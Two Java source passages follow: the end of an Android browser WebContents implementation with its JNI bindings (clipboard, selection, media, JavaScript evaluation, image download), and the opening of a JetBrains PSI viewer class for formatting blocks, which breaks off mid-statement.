return WebContentsImplJni.get().getEncoding(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public boolean isLoading() {
checkNotDestroyed();
return WebContentsImplJni.get().isLoading(mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public boolean shouldShowLoadingUI() {
checkNotDestroyed();
return WebContentsImplJni.get().shouldShowLoadingUI(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void dispatchBeforeUnload(boolean autoCancel) {
if (mNativeWebContentsAndroid == 0) return;
WebContentsImplJni.get().dispatchBeforeUnload(
mNativeWebContentsAndroid, WebContentsImpl.this, autoCancel);
}
@Override
public void stop() {
checkNotDestroyed();
WebContentsImplJni.get().stop(mNativeWebContentsAndroid, WebContentsImpl.this);
}
/**
* Cut the selected content.
*/
public void cut() {
checkNotDestroyed();
WebContentsImplJni.get().cut(mNativeWebContentsAndroid, WebContentsImpl.this);
}
/**
* Copy the selected content.
*/
public void copy() {
checkNotDestroyed();
WebContentsImplJni.get().copy(mNativeWebContentsAndroid, WebContentsImpl.this);
}
/**
* Paste content from the clipboard.
*/
public void paste() {
checkNotDestroyed();
WebContentsImplJni.get().paste(mNativeWebContentsAndroid, WebContentsImpl.this);
}
/**
* Paste content from the clipboard without format.
*/
public void pasteAsPlainText() {
checkNotDestroyed();
WebContentsImplJni.get().pasteAsPlainText(mNativeWebContentsAndroid, WebContentsImpl.this);
}
/**
* Replace the selected text with the {@code word}.
*/
public void replace(String word) {
checkNotDestroyed();
WebContentsImplJni.get().replace(mNativeWebContentsAndroid, WebContentsImpl.this, word);
}
/**
* Select all content.
*/
public void selectAll() {
checkNotDestroyed();
WebContentsImplJni.get().selectAll(mNativeWebContentsAndroid, WebContentsImpl.this);
}
/**
* Collapse the selection to the end of the selection range.
*/
public void collapseSelection() {
// collapseSelection may get triggered when certain selection-related widgets
// are destroyed. As the timing for such destruction is unpredictable,
// safely guard against this case.
if (isDestroyed()) return;
WebContentsImplJni.get().collapseSelection(mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void onHide() {
checkNotDestroyed();
SelectionPopupControllerImpl controller = getSelectionPopupController();
if (controller != null) controller.hidePopupsAndPreserveSelection();
WebContentsImplJni.get().onHide(mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void onShow() {
checkNotDestroyed();
WebContentsAccessibilityImpl wcax = WebContentsAccessibilityImpl.fromWebContents(this);
if (wcax != null) wcax.refreshState();
SelectionPopupControllerImpl controller = getSelectionPopupController();
if (controller != null) controller.restoreSelectionPopupsIfNecessary();
WebContentsImplJni.get().onShow(mNativeWebContentsAndroid, WebContentsImpl.this);
}
private SelectionPopupControllerImpl getSelectionPopupController() {
return SelectionPopupControllerImpl.fromWebContents(this);
}
@Override
public void setImportance(@ChildProcessImportance int primaryMainFrameImportance) {
checkNotDestroyed();
WebContentsImplJni.get().setImportance(
mNativeWebContentsAndroid, WebContentsImpl.this, primaryMainFrameImportance);
}
@Override
public void suspendAllMediaPlayers() {
checkNotDestroyed();
WebContentsImplJni.get().suspendAllMediaPlayers(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void setAudioMuted(boolean mute) {
checkNotDestroyed();
WebContentsImplJni.get().setAudioMuted(
mNativeWebContentsAndroid, WebContentsImpl.this, mute);
}
@Override
public boolean focusLocationBarByDefault() {
checkNotDestroyed();
return WebContentsImplJni.get().focusLocationBarByDefault(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public boolean isFullscreenForCurrentTab() {
checkNotDestroyed();
return WebContentsImplJni.get().isFullscreenForCurrentTab(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void exitFullscreen() {
checkNotDestroyed();
WebContentsImplJni.get().exitFullscreen(mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void scrollFocusedEditableNodeIntoView() {
checkNotDestroyed();
// The native side keeps track of whether the zoom and scroll actually occurred. It is
// more efficient to do it this way and sometimes fire an unnecessary message rather
// than synchronize with the renderer and always have an additional message.
WebContentsImplJni.get().scrollFocusedEditableNodeIntoView(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void selectAroundCaret(@SelectionGranularity int granularity, boolean shouldShowHandle,
boolean shouldShowContextMenu) {
checkNotDestroyed();
WebContentsImplJni.get().selectAroundCaret(mNativeWebContentsAndroid, WebContentsImpl.this,
granularity, shouldShowHandle, shouldShowContextMenu);
}
@Override
public void adjustSelectionByCharacterOffset(
int startAdjust, int endAdjust, boolean showSelectionMenu) {
WebContentsImplJni.get().adjustSelectionByCharacterOffset(mNativeWebContentsAndroid,
WebContentsImpl.this, startAdjust, endAdjust, showSelectionMenu);
}
@Override
public GURL getLastCommittedUrl() {
checkNotDestroyed();
return WebContentsImplJni.get().getLastCommittedURL(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public boolean isIncognito() {
checkNotDestroyed();
return WebContentsImplJni.get().isIncognito(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void resumeLoadingCreatedWebContents() {
checkNotDestroyed();
WebContentsImplJni.get().resumeLoadingCreatedWebContents(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void evaluateJavaScript(String script, JavaScriptCallback callback) {
ThreadUtils.assertOnUiThread();
if (isDestroyed() || script == null) return;
WebContentsImplJni.get().evaluateJavaScript(
mNativeWebContentsAndroid, WebContentsImpl.this, script, callback);
}
@Override
@VisibleForTesting
public void evaluateJavaScriptForTests(String script, JavaScriptCallback callback) {
ThreadUtils.assertOnUiThread();
if (script == null) return;
checkNotDestroyed();
WebContentsImplJni.get().evaluateJavaScriptForTests(
mNativeWebContentsAndroid, WebContentsImpl.this, script, callback);
}
@Override
public void addMessageToDevToolsConsole(int level, String message) {
checkNotDestroyed();
WebContentsImplJni.get().addMessageToDevToolsConsole(
mNativeWebContentsAndroid, WebContentsImpl.this, level, message);
}
@Override
public void postMessageToMainFrame(
String message, String sourceOrigin, String targetOrigin, MessagePort[] ports) {
if (ports != null) {
for (MessagePort port : ports) {
if (port.isClosed() || port.isTransferred()) {
throw new IllegalStateException("Port is already closed or transferred");
}
if (port.isStarted()) {
throw new IllegalStateException("Port is already started");
}
}
}
// Treat "*" as a wildcard. Internally, a wildcard is a empty string.
if (targetOrigin.equals("*")) {
targetOrigin = "";
}
WebContentsImplJni.get().postMessageToMainFrame(mNativeWebContentsAndroid,
WebContentsImpl.this, message, sourceOrigin, targetOrigin, ports);
}
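// Illustrative sketch, not part of the original class: posting a message together with a
// transferred port, relying on the "*" wildcard handling above. Variable names are
// hypothetical.
//
//   AppWebMessagePort[] channel = webContents.createMessageChannel();
//   webContents.postMessageToMainFrame("hello", "", "*", new MessagePort[] {channel[1]});
//   // channel[0] stays on the app side and can be used to receive replies from the page.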
@Override
public AppWebMessagePort[] createMessageChannel()
throws IllegalStateException {
return AppWebMessagePort.createPair();
}
@Override
public boolean hasAccessedInitialDocument() {
checkNotDestroyed();
return WebContentsImplJni.get().hasAccessedInitialDocument(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@CalledByNative
private static void onEvaluateJavaScriptResult(
String jsonResult, JavaScriptCallback callback) {
callback.handleJavaScriptResult(jsonResult);
}
@Override
public int getThemeColor() {
checkNotDestroyed();
return WebContentsImplJni.get().getThemeColor(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public float getLoadProgress() {
checkNotDestroyed();
return WebContentsImplJni.get().getLoadProgress(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void requestSmartClipExtract(int x, int y, int width, int height) {
if (mSmartClipCallback == null) return;
checkNotDestroyed();
RenderCoordinatesImpl coordinateSpace = getRenderCoordinates();
float dpi = coordinateSpace.getDeviceScaleFactor();
y = y - (int) coordinateSpace.getContentOffsetYPix();
WebContentsImplJni.get().requestSmartClipExtract(mNativeWebContentsAndroid,
WebContentsImpl.this, mSmartClipCallback, (int) (x / dpi), (int) (y / dpi),
(int) (width / dpi), (int) (height / dpi));
}
@Override
public void setSmartClipResultHandler(final Handler smartClipHandler) {
if (smartClipHandler == null) {
mSmartClipCallback = null;
return;
}
mSmartClipCallback = new SmartClipCallback(smartClipHandler);
}
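// Illustrative sketch, not part of the original class: wiring a result Handler and then
// requesting an extract for a region given in physical pixels. The rectangle values are
// hypothetical.
//
//   Handler handler = new Handler(Looper.getMainLooper()) {
//       @Override
//       public void handleMessage(Message msg) {
//           Bundle data = msg.getData();
//           Log.d(TAG, "Smart clip text: " + data.getString("text"));
//       }
//   };
//   webContents.setSmartClipResultHandler(handler);
//   webContents.requestSmartClipExtract(0, 0, 200, 100);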
@CalledByNative
private static void onSmartClipDataExtracted(String text, String html, int left, int top,
int right, int bottom, SmartClipCallback callback) {
callback.onSmartClipDataExtracted(text, html, new Rect(left, top, right, bottom));
}
/**
* Requests a snapshot of the accessibility tree. The result is provided asynchronously
* through the callback.
* @param root The {@link ViewStructure} to populate with the snapshot.
* @param doneCallback The callback invoked when the snapshot is ready. Cannot be null.
*/
public void requestAccessibilitySnapshot(ViewStructure root, Runnable doneCallback) {
checkNotDestroyed();
ViewStructureBuilder builder = ViewStructureBuilder.create(mRenderCoordinates);
WebContentsImplJni.get().requestAccessibilitySnapshot(
mNativeWebContentsAndroid, root, builder, doneCallback);
}
@VisibleForTesting
public void simulateRendererKilledForTesting(boolean wasOomProtected) {
if (mObserverProxy != null) {
mObserverProxy.renderProcessGone(wasOomProtected);
}
}
@Override
public EventForwarder getEventForwarder() {
assert mNativeWebContentsAndroid != 0;
if (mEventForwarder == null) {
checkNotDestroyed();
mEventForwarder = WebContentsImplJni.get().getOrCreateEventForwarder(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
return mEventForwarder;
}
@Override
public void addObserver(WebContentsObserver observer) {
assert mNativeWebContentsAndroid != 0;
if (mObserverProxy == null) mObserverProxy = new WebContentsObserverProxy(this);
mObserverProxy.addObserver(observer);
}
@Override
public void removeObserver(WebContentsObserver observer) {
if (mObserverProxy == null) return;
mObserverProxy.removeObserver(observer);
}
@Override
public void setOverscrollRefreshHandler(OverscrollRefreshHandler handler) {
checkNotDestroyed();
WebContentsImplJni.get().setOverscrollRefreshHandler(
mNativeWebContentsAndroid, WebContentsImpl.this, handler);
}
@Override
public void setSpatialNavigationDisabled(boolean disabled) {
checkNotDestroyed();
WebContentsImplJni.get().setSpatialNavigationDisabled(
mNativeWebContentsAndroid, WebContentsImpl.this, disabled);
}
@Override
public int downloadImage(GURL url, boolean isFavicon, int maxBitmapSize, boolean bypassCache,
ImageDownloadCallback callback) {
checkNotDestroyed();
return WebContentsImplJni.get().downloadImage(mNativeWebContentsAndroid,
WebContentsImpl.this, url, isFavicon, maxBitmapSize, bypassCache, callback);
}
@CalledByNative
private void onDownloadImageFinished(ImageDownloadCallback callback, int id, int httpStatusCode,
GURL imageUrl, List<Bitmap> bitmaps, List<Rect> sizes) {
callback.onFinishDownloadImage(id, httpStatusCode, imageUrl, bitmaps, sizes);
}
@Override
public void setHasPersistentVideo(boolean value) {
checkNotDestroyed();
WebContentsImplJni.get().setHasPersistentVideo(
mNativeWebContentsAndroid, WebContentsImpl.this, value);
}
@Override
public boolean hasActiveEffectivelyFullscreenVideo() {
checkNotDestroyed();
return WebContentsImplJni.get().hasActiveEffectivelyFullscreenVideo(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public boolean isPictureInPictureAllowedForFullscreenVideo() {
checkNotDestroyed();
return WebContentsImplJni.get().isPictureInPictureAllowedForFullscreenVideo(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public @Nullable Rect getFullscreenVideoSize() {
checkNotDestroyed();
return WebContentsImplJni.get().getFullscreenVideoSize(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void setSize(int width, int height) {
checkNotDestroyed();
WebContentsImplJni.get().setSize(
mNativeWebContentsAndroid, WebContentsImpl.this, width, height);
}
@Override
public int getWidth() {
checkNotDestroyed();
return WebContentsImplJni.get().getWidth(mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public int getHeight() {
checkNotDestroyed();
return WebContentsImplJni.get().getHeight(mNativeWebContentsAndroid, WebContentsImpl.this);
}
@CalledByNative
private final void setMediaSession(MediaSessionImpl mediaSession) {
mMediaSession = mediaSession;
}
@CalledByNative
private static List<Bitmap> createBitmapList() {
return new ArrayList<Bitmap>();
}
@CalledByNative
private static void addToBitmapList(List<Bitmap> bitmaps, Bitmap bitmap) {
bitmaps.add(bitmap);
}
@CalledByNative
private static List<Rect> createSizeList() {
return new ArrayList<Rect>();
}
@CalledByNative
private static void createSizeAndAddToList(List<Rect> sizes, int width, int height) {
sizes.add(new Rect(0, 0, width, height));
}
@CalledByNative
private static Rect createSize(int width, int height) {
return new Rect(0, 0, width, height);
}
/**
* Returns {@link RenderCoordinatesImpl}.
*/
public RenderCoordinatesImpl getRenderCoordinates() {
return mRenderCoordinates;
}
/**
* Retrieves or stores a user data object for this WebContents.
* @param key Class instance of the object used as the key.
* @param userDataFactory Factory that creates an object of the generic class. A new object
* is created if it hasn't been created yet and a non-null factory is given.
* @return The created or retrieved user data object. Can be null if the object was
* not created yet, or {@code userDataFactory} is null, or the internal data
* storage is already garbage-collected.
*/
public <T extends UserData> T getOrSetUserData(
Class<T> key, UserDataFactory<T> userDataFactory) {
// For tests that go without calling |initialize|.
if (!mInitialized) return null;
UserDataHost userDataHost = getUserDataHost();
// Map can be null after WebView gets gc'ed on its way to destruction.
if (userDataHost == null) {
Log.d(TAG, "UserDataHost can't be found");
return null;
}
T data = userDataHost.getUserData(key);
if (data == null && userDataFactory != null) {
assert userDataHost.getUserData(key) == null; // Do not allow overwriting
T object = userDataFactory.create(this);
assert key.isInstance(object);
// Retrieves from the map again to return null in case |setUserData| fails
// to store the object.
data = userDataHost.setUserData(key, object);
}
return key.cast(data);
}
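// Illustrative sketch, not part of the original class: a client class attaching itself as
// user data via getOrSetUserData(), following the lazy-holder pattern described on
// UserDataFactory. ExampleUserData and its from() helper are hypothetical names.
//
//   class ExampleUserData implements UserData {
//       private static final class FactoryHolder {
//           private static final UserDataFactory<ExampleUserData> INSTANCE = ExampleUserData::new;
//       }
//       ExampleUserData(WebContents webContents) {}
//       static ExampleUserData from(WebContentsImpl webContents) {
//           return webContents.getOrSetUserData(ExampleUserData.class, FactoryHolder.INSTANCE);
//       }
//   }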
public <T extends UserData> void removeUserData(Class<T> key) {
UserDataHost userDataHost = getUserDataHost();
if (userDataHost == null) return;
userDataHost.removeUserData(key);
}
/**
* @return {@code UserDataHost} that contains internal user data. {@code null} if
* it is already gc'ed.
*/
private UserDataHost getUserDataHost() {
if (mInternalsHolder == null) return null;
WebContentsInternals internals = mInternalsHolder.get();
if (internals == null) return null;
return ((WebContentsInternalsImpl) internals).userDataHost;
}
// WindowEventObserver
@Override
public void onRotationChanged(int rotation) {
if (mNativeWebContentsAndroid == 0) return;
int rotationDegrees = 0;
switch (rotation) {
case Surface.ROTATION_0:
rotationDegrees = 0;
break;
case Surface.ROTATION_90:
rotationDegrees = 90;
break;
case Surface.ROTATION_180:
rotationDegrees = 180;
break;
case Surface.ROTATION_270:
rotationDegrees = -90;
break;
default:
throw new IllegalStateException(
"Display.getRotation() shouldn't return that value");
}
WebContentsImplJni.get().sendOrientationChangeEvent(
mNativeWebContentsAndroid, WebContentsImpl.this, rotationDegrees);
}
@Override
public void onDIPScaleChanged(float dipScale) {
if (mNativeWebContentsAndroid == 0) return;
mRenderCoordinates.setDeviceScaleFactor(dipScale);
WebContentsImplJni.get().onScaleFactorChanged(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void setFocus(boolean hasFocus) {
if (mNativeWebContentsAndroid == 0) return;
WebContentsImplJni.get().setFocus(
mNativeWebContentsAndroid, WebContentsImpl.this, hasFocus);
}
@Override
public void setDisplayCutoutSafeArea(Rect insets) {
if (mNativeWebContentsAndroid == 0) return;
WebContentsImplJni.get().setDisplayCutoutSafeArea(mNativeWebContentsAndroid,
WebContentsImpl.this, insets.top, insets.left, insets.bottom, insets.right);
}
@Override
public void notifyRendererPreferenceUpdate() {
if (mNativeWebContentsAndroid == 0) return;
WebContentsImplJni.get().notifyRendererPreferenceUpdate(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void notifyBrowserControlsHeightChanged() {
if (mNativeWebContentsAndroid == 0) return;
WebContentsImplJni.get().notifyBrowserControlsHeightChanged(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
private void checkNotDestroyed() {
if (mNativeWebContentsAndroid != 0) return;
throw new IllegalStateException(
"Native WebContents already destroyed", mNativeDestroyThrowable);
}
@NativeMethods
interface Natives {
// This is static to avoid exposing a public destroy method on the native side of this
// class.
void destroyWebContents(long webContentsAndroidPtr);
WebContents fromNativePtr(long webContentsAndroidPtr);
void clearNativeReference(long nativeWebContentsAndroid, WebContentsImpl caller);
WindowAndroid getTopLevelNativeWindow(
long nativeWebContentsAndroid, WebContentsImpl caller);
void setTopLevelNativeWindow(
long nativeWebContentsAndroid, WebContentsImpl caller, WindowAndroid windowAndroid);
RenderFrameHost getMainFrame(long nativeWebContentsAndroid, WebContentsImpl caller);
RenderFrameHost getFocusedFrame(long nativeWebContentsAndroid, WebContentsImpl caller);
RenderFrameHost getRenderFrameHostFromId(
long nativeWebContentsAndroid, int renderProcessId, int renderFrameId);
RenderFrameHost[] getAllRenderFrameHosts(
long nativeWebContentsAndroid, WebContentsImpl caller);
RenderWidgetHostViewImpl getRenderWidgetHostView(
long nativeWebContentsAndroid, WebContentsImpl caller);
WebContentsImpl[] getInnerWebContents(
long nativeWebContentsAndroid, WebContentsImpl caller);
@Visibility
int getVisibility(long nativeWebContentsAndroid);
String getTitle(long nativeWebContentsAndroid, WebContentsImpl caller);
GURL getVisibleURL(long nativeWebContentsAndroid, WebContentsImpl caller);
String getEncoding(long nativeWebContentsAndroid, WebContentsImpl caller);
boolean isLoading(long nativeWebContentsAndroid, WebContentsImpl caller);
boolean shouldShowLoadingUI(long nativeWebContentsAndroid, WebContentsImpl caller);
void dispatchBeforeUnload(
long nativeWebContentsAndroid, WebContentsImpl caller, boolean autoCancel);
void stop(long nativeWebContentsAndroid, WebContentsImpl caller);
void cut(long nativeWebContentsAndroid, WebContentsImpl caller);
void copy(long nativeWebContentsAndroid, WebContentsImpl caller);
void paste(long nativeWebContentsAndroid, WebContentsImpl caller);
void pasteAsPlainText(long nativeWebContentsAndroid, WebContentsImpl caller);
void replace(long nativeWebContentsAndroid, WebContentsImpl caller, String word);
void selectAll(long nativeWebContentsAndroid, WebContentsImpl caller);
void collapseSelection(long nativeWebContentsAndroid, WebContentsImpl caller);
void onHide(long nativeWebContentsAndroid, WebContentsImpl caller);
void onShow(long nativeWebContentsAndroid, WebContentsImpl caller);
void setImportance(long nativeWebContentsAndroid, WebContentsImpl caller, int importance);
void suspendAllMediaPlayers(long nativeWebContentsAndroid, WebContentsImpl caller);
void setAudioMuted(long nativeWebContentsAndroid, WebContentsImpl caller, boolean mute);
boolean focusLocationBarByDefault(long nativeWebContentsAndroid, WebContentsImpl caller);
boolean isFullscreenForCurrentTab(long nativeWebContentsAndroid, WebContentsImpl caller);
void exitFullscreen(long nativeWebContentsAndroid, WebContentsImpl caller);
void scrollFocusedEditableNodeIntoView(
long nativeWebContentsAndroid, WebContentsImpl caller);
void selectAroundCaret(long nativeWebContentsAndroid, WebContentsImpl caller,
int granularity, boolean shouldShowHandle, boolean shouldShowContextMenu);
void adjustSelectionByCharacterOffset(long nativeWebContentsAndroid, WebContentsImpl caller,
int startAdjust, int endAdjust, boolean showSelectionMenu);
GURL getLastCommittedURL(long nativeWebContentsAndroid, WebContentsImpl caller);
boolean isIncognito(long nativeWebContentsAndroid, WebContentsImpl caller);
void resumeLoadingCreatedWebContents(long nativeWebContentsAndroid, WebContentsImpl caller);
void evaluateJavaScript(long nativeWebContentsAndroid, WebContentsImpl caller,
String script, JavaScriptCallback callback);
void evaluateJavaScriptForTests(long nativeWebContentsAndroid, WebContentsImpl caller,
String script, JavaScriptCallback callback);
void addMessageToDevToolsConsole(
long nativeWebContentsAndroid, WebContentsImpl caller, int level, String message);
void postMessageToMainFrame(long nativeWebContentsAndroid, WebContentsImpl caller,
String message, String sourceOrigin, String targetOrigin, MessagePort[] ports);
boolean hasAccessedInitialDocument(long nativeWebContentsAndroid, WebContentsImpl caller);
int getThemeColor(long nativeWebContentsAndroid, WebContentsImpl caller);
float getLoadProgress(long nativeWebContentsAndroid, WebContentsImpl caller);
void requestSmartClipExtract(long nativeWebContentsAndroid, WebContentsImpl caller,
SmartClipCallback callback, int x, int y, int width, int height);
void requestAccessibilitySnapshot(long nativeWebContentsAndroid,
ViewStructure viewStructureRoot, ViewStructureBuilder viewStructureBuilder,
Runnable doneCallback);
void setOverscrollRefreshHandler(long nativeWebContentsAndroid, WebContentsImpl caller,
OverscrollRefreshHandler nativeOverscrollRefreshHandler);
void setSpatialNavigationDisabled(
long nativeWebContentsAndroid, WebContentsImpl caller, boolean disabled);
int downloadImage(long nativeWebContentsAndroid, WebContentsImpl caller, GURL url,
boolean isFavicon, int maxBitmapSize, boolean bypassCache,
ImageDownloadCallback callback);
void setHasPersistentVideo(
long nativeWebContentsAndroid, WebContentsImpl caller, boolean value);
boolean hasActiveEffectivelyFullscreenVideo(
long nativeWebContentsAndroid, WebContentsImpl caller);
boolean isPictureInPictureAllowedForFullscreenVideo(
long nativeWebContentsAndroid, WebContentsImpl caller);
Rect getFullscreenVideoSize(long nativeWebContentsAndroid, WebContentsImpl caller);
void setSize(long nativeWebContentsAndroid, WebContentsImpl caller, int width, int height);
int getWidth(long nativeWebContentsAndroid, WebContentsImpl caller);
int getHeight(long nativeWebContentsAndroid, WebContentsImpl caller);
EventForwarder getOrCreateEventForwarder(
long nativeWebContentsAndroid, WebContentsImpl caller);
void setViewAndroidDelegate(long nativeWebContentsAndroid, WebContentsImpl caller,
ViewAndroidDelegate viewDelegate);
void sendOrientationChangeEvent(
long nativeWebContentsAndroid, WebContentsImpl caller, int orientation);
void onScaleFactorChanged(long nativeWebContentsAndroid, WebContentsImpl caller);
void setFocus(long nativeWebContentsAndroid, WebContentsImpl caller, boolean focused);
void setDisplayCutoutSafeArea(long nativeWebContentsAndroid, WebContentsImpl caller,
int top, int left, int bottom, int right);
void notifyRendererPreferenceUpdate(long nativeWebContentsAndroid, WebContentsImpl caller);
void notifyBrowserControlsHeightChanged(
long nativeWebContentsAndroid, WebContentsImpl caller);
boolean isBeingDestroyed(long nativeWebContentsAndroid, WebContentsImpl caller);
}
}
|
|
/*
* Copyright 2000-2017 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.intellij.internal.psiView.formattingblocks;
import com.intellij.diagnostic.AttachmentFactory;
import com.intellij.diagnostic.LogMessageEx;
import com.intellij.formatting.ASTBlock;
import com.intellij.formatting.Block;
import com.intellij.formatting.FormattingModel;
import com.intellij.formatting.FormattingModelBuilder;
import com.intellij.ide.util.treeView.AbstractTreeStructure;
import com.intellij.internal.psiView.PsiViewerDialog;
import com.intellij.internal.psiView.ViewerPsiBasedTree;
import com.intellij.lang.ASTNode;
import com.intellij.lang.LanguageFormatting;
import com.intellij.lang.injection.InjectedLanguageManager;
import com.intellij.openapi.project.Project;
import com.intellij.openapi.util.Disposer;
import com.intellij.openapi.util.TextRange;
import com.intellij.openapi.wm.IdeFocusManager;
import com.intellij.psi.PsiElement;
import com.intellij.psi.PsiFile;
import com.intellij.psi.codeStyle.CodeStyleSettings;
import com.intellij.psi.codeStyle.CodeStyleSettingsManager;
import com.intellij.psi.impl.source.tree.injected.InjectedLanguageUtil;
import com.intellij.ui.IdeBorderFactory;
import com.intellij.ui.ScrollPaneFactory;
import com.intellij.ui.treeStructure.Tree;
import com.intellij.util.ObjectUtils;
import com.intellij.util.containers.ContainerUtil;
import com.intellij.util.containers.JBIterable;
import com.intellij.util.containers.JBTreeTraverser;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import javax.swing.*;
import javax.swing.event.TreeSelectionEvent;
import javax.swing.event.TreeSelectionListener;
import javax.swing.tree.DefaultMutableTreeNode;
import javax.swing.tree.DefaultTreeModel;
import java.awt.*;
import java.util.HashMap;
import java.util.Set;
import static com.intellij.internal.psiView.PsiViewerDialog.initTree;
public class BlockViewerPsiBasedTree implements ViewerPsiBasedTree {
@NotNull
private final JPanel myBlockStructurePanel;
@Nullable
private BlockTreeBuilder myBlockTreeBuilder;
@NotNull
private final Tree myBlockTree;
@NotNull
private final Project myProject;
@NotNull
private final PsiTreeUpdater myUpdater;
private int myIgnoreBlockTreeSelectionMarker = 0;
@Nullable
private volatile HashMap<PsiElement, BlockTreeNode> myPsiToBlockMap;
public BlockViewerPsiBasedTree(@NotNull Project project, @NotNull PsiTreeUpdater updater) {
myProject = project;
myUpdater = updater;
myBlockTree = new Tree(new DefaultTreeModel(new DefaultMutableTreeNode()));
myBlockStructurePanel = new JPanel(new BorderLayout());
myBlockStructurePanel.add(ScrollPaneFactory.createScrollPane(myBlockTree));
myBlockStructurePanel.setBorder(IdeBorderFactory.createBorder());
initTree(myBlockTree);
}
@Override
public void reloadTree(@Nullable PsiElement rootRootElement, @NotNull String text) {
resetBlockTree();
buildBlockTree(rootRootElement);
}
@Override
public void selectNodeFromPsi(@Nullable PsiElement element) {
if (myBlockTreeBuilder != null && element != null) {
BlockTreeNode currentBlockNode = findBlockNode(element);
if (currentBlockNode != null) {
selectBlockNode(currentBlockNode);
}
}
}
@NotNull
@Override
public JComponent getComponent() {
return myBlockStructurePanel;
}
@Override
public boolean isFocusOwner() {
return myBlockTree.isFocusOwner();
}
@Override
public void focusTree() {
IdeFocusManager.getInstance(myProject).requestFocus(myBlockTree, true);
}
@Override
public void dispose() {
resetBlockTree();
}
private void resetBlockTree() {
myBlockTree.removeAll();
if (myBlockTreeBuilder != null) {
Disposer.dispose(myBlockTreeBuilder);
myBlockTreeBuilder = null;
}
myPsiToBlockMap = null;
ViewerPsiBasedTree.removeListenerOfClass(myBlockTree, BlockTreeSelectionListener.class);
}
private void buildBlockTree(@Nullable PsiElement rootElement) {
Block rootBlock = rootElement == null ? null : buildBlocks(rootElement);
if (rootBlock == null) {
myBlockTreeBuilder = null;
myBlockTree.setRootVisible(false);
myBlockTree.setVisible(false);
return;
}
myBlockTree.setVisible(true);
BlockTreeStructure blockTreeStructure = new BlockTreeStructure();
BlockTreeNode rootNode = new BlockTreeNode(rootBlock, null);
blockTreeStructure.setRoot(rootNode);
myBlockTreeBuilder = new BlockTreeBuilder(myBlockTree, blockTreeStructure);
initMap(rootNode, rootElement);
assert myPsiToBlockMap != null;
PsiElement rootPsi = rootNode.getBlock() instanceof ASTBlock ?
((ASTBlock)rootNode.getBlock()).getNode().getPsi() : rootElement;
BlockTreeNode blockNode = myPsiToBlockMap.get(rootPsi);
if (blockNode == null) {
PsiViewerDialog.LOG.error(LogMessageEx
.createEvent("PsiViewer: rootNode not found",
"Current language: " + rootElement.getContainingFile().getLanguage(),
AttachmentFactory
.createAttachment(rootElement.getContainingFile().getOriginalFile().getVirtualFile())));
blockNode = findBlockNode(rootPsi);
}
blockTreeStructure.setRoot(blockNode);
myBlockTree.addTreeSelectionListener(new BlockTreeSelectionListener(rootElement));
myBlockTree.setRootVisible(true);
myBlockTree.expandRow(0);
myBlockTreeBuilder.queueUpdate();
}
@Nullable
private BlockTreeNode findBlockNode(PsiElement element) {
HashMap<PsiElement, BlockTreeNode> psiToBlockMap = myPsiToBlockMap;
BlockTreeNode result = psiToBlockMap == null ? null : psiToBlockMap.get(element);
if (result == null) {
TextRange rangeInHostFile = InjectedLanguageManager.getInstance(myProject).injectedToHost(element, element.getTextRange());
result = findBlockNode(rangeInHostFile);
}
return result;
}
private void selectBlockNode(@Nullable BlockTreeNode currentBlockNode) {
if (myBlockTreeBuilder == null) return;
if (currentBlockNode != null) {
myIgnoreBlockTreeSelectionMarker++;
myBlockTreeBuilder.select(currentBlockNode, () -> {
// hope this is always called!
assert myIgnoreBlockTreeSelectionMarker > 0;
myIgnoreBlockTreeSelectionMarker--;
});
}
else {
myIgnoreBlockTreeSelectionMarker++;
try {
myBlockTree.getSelectionModel().clearSelection();
}
finally {
assert myIgnoreBlockTreeSelectionMarker > 0;
myIgnoreBlockTreeSelectionMarker--;
}
}
}
public class BlockTreeSelectionListener implements TreeSelectionListener {
@NotNull
private PsiElement myRootElement;
public BlockTreeSelectionListener(@NotNull PsiElement rootElement) {
myRootElement = rootElement;
}
@Override
public void valueChanged(@NotNull TreeSelectionEvent e) {
if (myIgnoreBlockTreeSelectionMarker > 0 || myBlockTreeBuilder == null) {
return;
}
Set<?> blockElementsSet = myBlockTreeBuilder.getSelectedElements();
Object item = ContainerUtil.getFirstItem(blockElementsSet);
if (!(item instanceof BlockTreeNode)) return;
BlockTreeNode descriptor = (BlockTreeNode)item;
PsiElement rootPsi = myRootElement;
int blockStart = descriptor.getBlock().getTextRange().getStartOffset();
PsiFile file = rootPsi.getContainingFile();
PsiElement currentPsiEl = InjectedLanguageUtil.findElementAtNoCommit(file, blockStart);
if (currentPsiEl == null) currentPsiEl = file;
int blockLength = descriptor.getBlock().getTextRange().getLength();
while (currentPsiEl.getParent() != null &&
currentPsiEl.getTextRange().getStartOffset() == blockStart &&
